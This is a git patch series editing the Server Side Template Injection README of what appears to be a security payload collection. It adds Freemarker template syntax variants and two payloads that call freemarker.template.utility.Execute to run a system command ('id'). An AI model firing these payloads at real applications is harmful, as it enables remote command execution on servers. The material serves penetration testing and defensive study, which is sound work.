From 29c23ac7fdbd8acb0f38fa17cfa216454c3072c5 Mon Sep 17 00:00:00 2001 From: Aur0ra <103031059+Aur0ra-m@users.noreply.github.com> Date: Tue, 27 Dec 2022 18:30:20 +0800 Subject: [PATCH 1/2] Update README.md --- Server Side Template Injection/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 656dc05..875c22a 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -199,7 +199,7 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre ### Freemarker - Basic injection -The template can be `${3*3}` or the legacy `#{3*3}`. +The template can be `${3*3}` `#{3*3}` or the legacy `[=3*3]`. ### Freemarker - Read File @@ -214,6 +214,8 @@ Convert the returned bytes to ASCII <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ${"freemarker.template.utility.Execute"?new()("id")} +#{"freemarker.template.utility.Execute"?new()("id")} +[="freemarker.template.utility.Execute"?new()("id")] ``` ### Freemarker - Sandbox bypass From f318f8bcc044f126e1b8e42e4d3c8b8c3e9389c9 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 27 Dec 2022 18:26:13 +0100 Subject: [PATCH 2/2] Update README.md --- Server Side Template Injection/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 875c22a..6018c46 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -199,7 +199,11 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre ### Freemarker - Basic injection -The template can be `${3*3}` `#{3*3}` or the legacy `[=3*3]`. +The template can be : + +* Default: `${3*3}` +* Legacy: `#{3*3}` +* Alternative: `[=3*3]` since [FreeMarker 2.3.4](https://freemarker.apache.org/docs/dgui_misc_alternativesyntax.html) ### Freemarker - Read File